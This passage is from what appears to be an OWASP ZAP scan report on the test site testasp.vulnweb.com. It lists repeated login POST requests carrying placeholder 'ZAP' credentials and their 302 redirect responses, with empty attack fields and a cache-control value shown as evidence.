Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=15 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=15">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=16 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=16">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=17 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=17">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=18 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=18">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=19 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:06 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=19">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 459 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=2 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=2">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=20 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:06 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=20">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=21 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:06 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=21">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=22 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=22">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=23 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=23">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=24 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=24">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=25 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=25">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=26 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=26">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=27 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=27">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=28 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=28">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=29 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=29">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 459 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=3 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=3">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=30 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=30">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=31 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=31">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=32 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=32">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=33 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=33">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=34 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=34">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=35 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=35">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
